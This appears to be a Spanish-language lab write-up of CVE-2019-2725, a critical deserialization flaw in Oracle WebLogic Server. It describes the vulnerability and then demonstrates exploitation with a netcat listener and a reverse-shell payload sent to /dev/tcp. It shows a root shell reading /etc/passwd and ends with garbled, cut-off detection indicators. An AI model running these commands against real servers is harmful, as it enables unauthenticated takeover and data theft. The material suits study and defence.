
Vulnerabilidad en el componente Oracle WebLogic Server de Oracle Fusion Middleware (subcomponente: Web Services). Las versiones compatibles afectadas son 10.3.6.0.0 y 12.1.3.0.0. Una vulnerabilidad fácilmente explotable permite que un atacante no autenticado con acceso a la red a través de HTTP comprometa Oracle WebLogic Server.
Vulnerabilidad en el componente Oracle WebLogic Server de Oracle Fusion Middleware (subcomponente: Web Services). Las versiones compatibles afectadas son 10.3.6.0.0 y 12.1.3.0.0. Una vulnerabilidad fácilmente explotable permite a un atacante no autenticado con acceso a la red a través de HTTP comprometer el Oracle WebLogic Server.
ID de CVE: CVE-2019-2725
Severidad: Crítica (CVSS v3: 9.8)
Tipo de Vulnerabilidad: Ejecución Remota de Código No Autenticada (RCE)
Producto Afectado: Oracle WebLogic Server
Componente Afectado: AsyncResponseService
Autenticación Requerida: No
Interacción del Usuario Requerida: No
CVE-2019-2725 es una vulnerabilidad crítica de deserialización en Oracle WebLogic Server que permite a atacantes remotos no autenticados ejecutar comandos arbitrarios del sistema mediante una solicitud SOAP especialmente diseñada enviada al endpoint /_async/AsyncResponseService.
Versiones de Oracle WebLogic Server anteriores al Critical Patch Update de abril de 2019, incluyendo, entre otras:
La vulnerabilidad existe debido a una deserialización insegura en el AsyncResponseService.
Un atacante puede enviar una carga útil XML maliciosa que da como resultado la ejecución de comandos arbitrarios en el sistema operativo subyacente sin autenticación.
Este problema es particularmente peligroso porque:
Inicie un listener de Netcat para recibir la reverse shell:
nc -lvp 2323
Ejecute el script del exploit contra el servidor WebLogic vulnerable:
python3 CVE-2019-2725.py http://172.17.0.6:7001/_async/AsyncResponseService '/bin/bash -i >& /dev/tcp/172.17.0.10/2323 0>&1'
Salida esperada:
[+] Target appears VULNERABLE
[*] Sending payload...
[+] Payload delivered successfully (HTTP 202)
En el listener de Netcat, se recibe una reverse shell:
Listening on 0.0.0.0 2323
Connection received on 172.17.0.6 39926
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain# whoami
root
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain# pwd
/root/Oracle/Middleware/user_projects/domains/base_domain
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#
Los siguientes indicadores pueden sugerir un intento de explotación o una explotación exitosa:
HTTP 202 Accepted de servicios asíncronos/bin/bash/bin/shSe hizo referencia a los siguientes repositorios públicos para la comprensión y validación del exploit: